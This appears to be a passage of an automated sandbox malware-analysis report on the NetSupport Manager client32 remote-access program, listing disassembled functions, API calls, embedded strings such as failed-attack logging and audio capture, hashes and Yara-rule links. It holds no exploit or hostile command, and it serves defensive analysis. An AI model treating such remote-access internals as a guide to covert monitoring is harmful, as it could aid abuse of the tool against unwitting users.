                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                                                                                    • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                                                                                    • API String ID: 3451743168-2289091950
                                                                                                                                                    • Opcode ID: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                                                                                                    • Instruction ID: 06eeb675c9fb82aaee3c5e1b90d71b9ae50c85907530b7dc4e87486fa2a47647
                                                                                                                                                    • Opcode Fuzzy Hash: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                                                                                                    • Instruction Fuzzy Hash: A141E775A012199FD724CFA5DC84FAEF7B8EF48304F1085AAE91AA7640D631AD40CFB1
                                                                                                                                                    Function 11039410 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 126windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                                                                      • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                                                                      • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                                                                      • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                                                                      • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                                                                    • GetDlgItem.USER32(00000000,00000001), ref: 1103944A
                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 1103944F
                                                                                                                                                    • _calloc.LIBCMT ref: 1103945C
                                                                                                                                                    • GetSystemMenu.USER32(?,00000000), ref: 11039490
                                                                                                                                                    • EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103949E
                                                                                                                                                    • GetDlgItem.USER32(00000000,0000044E), ref: 110394BC
                                                                                                                                                    • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000043), ref: 11039509
                                                                                                                                                    • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 11039538
                                                                                                                                                    • UpdateWindow.USER32(00000000), ref: 11039567
                                                                                                                                                    • BringWindowToTop.USER32(?), ref: 1103956E
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                      • Part of subcall function 1115FFC0: SetForegroundWindow.USER32(?), ref: 1115FFEE
                                                                                                                                                    • MessageBeep.USER32(000000FF), ref: 1103957F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Item$EnableMenuMessage$BeepBringErrorExitForegroundLastObjectProcessRectShowSystemTextUpdate_callocwsprintf
                                                                                                                                                    • String ID: CLTCONN.CPP$e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_nc
                                                                                                                                                    • API String ID: 4191401721-1182766118
                                                                                                                                                    • Opcode ID: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
                                                                                                                                                    • Instruction ID: fea8d420f6ab3010a63bc2930e21c2de0d8b75aa48f279369a9769ea0f724755
                                                                                                                                                    • Opcode Fuzzy Hash: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
                                                                                                                                                    • Instruction Fuzzy Hash: 0C411AB9B803157BE7209761DC87F9AF398AB84B1CF104434F3267B6C0EAB5B4408759
                                                                                                                                                    Function 110CB450 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 117registryclipboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EnterCriticalSection.KERNEL32(111F3420,?,00000000,00000000,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB45E
                                                                                                                                                    • RegisterClipboardFormatA.USER32(WM_ATLGETHOST), ref: 110CB46F
                                                                                                                                                    • RegisterClipboardFormatA.USER32(WM_ATLGETCONTROL), ref: 110CB47B
                                                                                                                                                    • GetClassInfoExA.USER32(11000000,AtlAxWin100,?), ref: 110CB4A0
                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 110CB4D1
                                                                                                                                                    • RegisterClassExA.USER32(?), ref: 110CB4F2
                                                                                                                                                    • _memset.LIBCMT ref: 110CB51B
                                                                                                                                                    • GetClassInfoExA.USER32(11000000,AtlAxWinLic100,?), ref: 110CB536
                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 110CB56B
                                                                                                                                                    • RegisterClassExA.USER32(?), ref: 110CB58C
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111F3420,0000000E), ref: 110CB5B5
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111F3420,?,?,?,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB5CB
                                                                                                                                                      • Part of subcall function 110C2C00: __recalloc.LIBCMT ref: 110C2C48
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassRegister$CriticalSection$ClipboardCursorFormatInfoLeaveLoad$Enter__recalloc_memset
                                                                                                                                                    • String ID: AtlAxWin100$AtlAxWinLic100$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                                                                                    • API String ID: 2220097787-1587594278
                                                                                                                                                    • Opcode ID: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                                                                                    • Instruction ID: 380367346e18165f725bae6bc82d4f79de56b371e9301c8febdab5dbf058e0d0
                                                                                                                                                    • Opcode Fuzzy Hash: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                                                                                    • Instruction Fuzzy Hash: 854179B5D02229ABCB01DFD9E984AEEFFB9FB48714F50406AE415B3200DB351A44CFA4
                                                                                                                                                    Function 11003650 Relevance: 27.2, APIs: 18, Instructions: 171COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColor.USER32(00000004), ref: 11003691
                                                                                                                                                      • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
                                                                                                                                                      • Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
                                                                                                                                                      • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111
                                                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 110036A5
                                                                                                                                                    • GetStockObject.GDI32(00000007), ref: 110036B0
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 110036BB
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 110036CC
                                                                                                                                                    • GetSysColor.USER32(00000010), ref: 110036DC
                                                                                                                                                    • GetSysColor.USER32(00000010), ref: 110036F3
                                                                                                                                                    • GetSysColor.USER32(00000014), ref: 1100370A
                                                                                                                                                    • GetSysColor.USER32(00000014), ref: 11003721
                                                                                                                                                    • GetSysColor.USER32(00000014), ref: 1100373E
                                                                                                                                                    • GetSysColor.USER32(00000014), ref: 11003755
                                                                                                                                                    • GetSysColor.USER32(00000010), ref: 1100376C
                                                                                                                                                    • GetSysColor.USER32(00000010), ref: 11003783
                                                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 110037A0
                                                                                                                                                    • Rectangle.GDI32(?,?,00000001,?,?), ref: 110037BA
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 110037CE
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 110037D8
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 110037DE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3698065672-0
                                                                                                                                                    • Opcode ID: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
                                                                                                                                                    • Instruction ID: a23acd2a2556d2351ec77cf4709ac6c6322e0be3c302c098e9beaf4924cedc1a
                                                                                                                                                    • Opcode Fuzzy Hash: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
                                                                                                                                                    • Instruction Fuzzy Hash: 78515EB5900309AFE714DFA5CC85EBBF3BDEF98704F104A18E611A7691D670B944CBA1
                                                                                                                                                    Function 1104B7F0 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 229timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLocalTime.KERNEL32(?,FailedAttacks,00000001,FailedAttacks,00000000,80000002,Software\Productive Computer Insight\Client32,0002001F,00000000,00000000,?,?,?,1EF76653,?,?), ref: 1104B8F6
                                                                                                                                                    • _sprintf.LIBCMT ref: 1104B923
                                                                                                                                                      • Part of subcall function 110ED9F0: RegSetValueExA.ADVAPI32(00000002,?,00000000,?,00000001,00000003,?,?,?,?,11112835,authcode,?,00000001,authcode,000F003F), ref: 110EDA19
                                                                                                                                                    • _strncpy.LIBCMT ref: 1104BACE
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorExitLastLocalMessageProcessTimeValue_sprintf_strncpywsprintf
                                                                                                                                                    • String ID: @ %s$%04d/%02d/%02d %02d:%02d:%02d$%s, %d$*** Warning. Failed Attack %u, from %s, at %s$FailedAttacks$Info. Connection Rejected, reason=%d$IsA()$LastAttack$LastAttacker$NC-$Software\Productive Computer Insight\Client32$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                    • API String ID: 3341947355-3231647555
                                                                                                                                                    • Opcode ID: c1a08ebd0c0cca2c53fd9c2065dee75976c60c6aa31f1c1f1af79d9370508339
                                                                                                                                                    • Instruction ID: fe029f2b4bd5101e4da145cc81d4ac0798fef8b5c75ba173e470820e68b704ff
                                                                                                                                                    • Opcode Fuzzy Hash: c1a08ebd0c0cca2c53fd9c2065dee75976c60c6aa31f1c1f1af79d9370508339
                                                                                                                                                    • Instruction Fuzzy Hash: 34916075E00219AFEB10CFA9CC84FEEFBB4EF45704F148199E549A7281EB716A44CB61
                                                                                                                                                    Function 11047010 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 214COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _calloc.LIBCMT ref: 1104702F
                                                                                                                                                    • wsprintfA.USER32 ref: 110470AE
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    • wsprintfA.USER32 ref: 110470E9
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000014,00000080), ref: 11047203
                                                                                                                                                    • _strrchr.LIBCMT ref: 1104720C
                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(00000016,00000080), ref: 11047235
                                                                                                                                                    • _free.LIBCMT ref: 11047251
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wsprintf$DirectoryErrorExitFileLastMessageModuleNameProcessWindows_calloc_free_strrchr
                                                                                                                                                    • String ID: %s %s$CLTCONN.CPP$NSA %s$NSS$V1.10$V12.00$V12.10$V12.10F20
                                                                                                                                                    • API String ID: 1757445300-1785190265
                                                                                                                                                    • Opcode ID: 24c3795b5edef53b19da24d8b2da5203a0cff33bf5a432e62935ac5c0fdc3eed
                                                                                                                                                    • Instruction ID: 26d4bceacdf9fffedd66530a5670ce95754bb6fc5caa385817b5218b2f2053ae
                                                                                                                                                    • Opcode Fuzzy Hash: 24c3795b5edef53b19da24d8b2da5203a0cff33bf5a432e62935ac5c0fdc3eed
                                                                                                                                                    • Instruction Fuzzy Hash: 3F619A78E00657ABD714CFB48CC1B6FF7E99F40308F1048A8ED5697641EA62F904C3A2
                                                                                                                                                    Function 1100B440 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 190fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                    • _malloc.LIBCMT ref: 1100B496
                                                                                                                                                      • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                                                                                      • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                                                                                      • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                                                                      • Part of subcall function 1100AD10: EnterCriticalSection.KERNEL32(000000FF,1EF76653,?,00000000,00000000), ref: 1100AD54
                                                                                                                                                      • Part of subcall function 1100AD10: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100AD72
                                                                                                                                                      • Part of subcall function 1100AD10: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ADBE
                                                                                                                                                      • Part of subcall function 1100AD10: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AE05
                                                                                                                                                      • Part of subcall function 1100AD10: CloseHandle.KERNEL32(00000000), ref: 1100AE0C
                                                                                                                                                      • Part of subcall function 1100AD10: _free.LIBCMT ref: 1100AE23
                                                                                                                                                      • Part of subcall function 1100AD10: FreeLibrary.KERNEL32(?), ref: 1100AE3B
                                                                                                                                                      • Part of subcall function 1100AD10: LeaveCriticalSection.KERNEL32(?), ref: 1100AE45
                                                                                                                                                    • EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,1EF76653,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
                                                                                                                                                    • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CB7A,?), ref: 1100B4E8
                                                                                                                                                    • _calloc.LIBCMT ref: 1100B519
                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(1100CB7A,?,?,1100CB7A,?), ref: 1100B59E
                                                                                                                                                    Strings
                                                                                                                                                    • Vista AddAudioCapEvtListener(%p), xrefs: 1100B623
                                                                                                                                                    • Vista new pAudioCap=%p, xrefs: 1100B603
                                                                                                                                                    • InitCaptureSounds NT6, xrefs: 1100B5BE
                                                                                                                                                    • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B5F3
                                                                                                                                                    • DisableSounds, xrefs: 1100B472
                                                                                                                                                    • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B64C
                                                                                                                                                    • \\.\NSAudioFilter, xrefs: 1100B4E0
                                                                                                                                                    • Audio, xrefs: 1100B477
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                                                                                    • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                                                                                    • API String ID: 1843377891-2362500394
                                                                                                                                                    • Opcode ID: ac985d5f38071a6d61f3d9ef1a3b635a51863d168853f4ed84212ab79fecb887
                                                                                                                                                    • Instruction ID: 79732c4921e51442e8b050610a6755ede2f12e6e97fc197f43339bcf40ac1e73
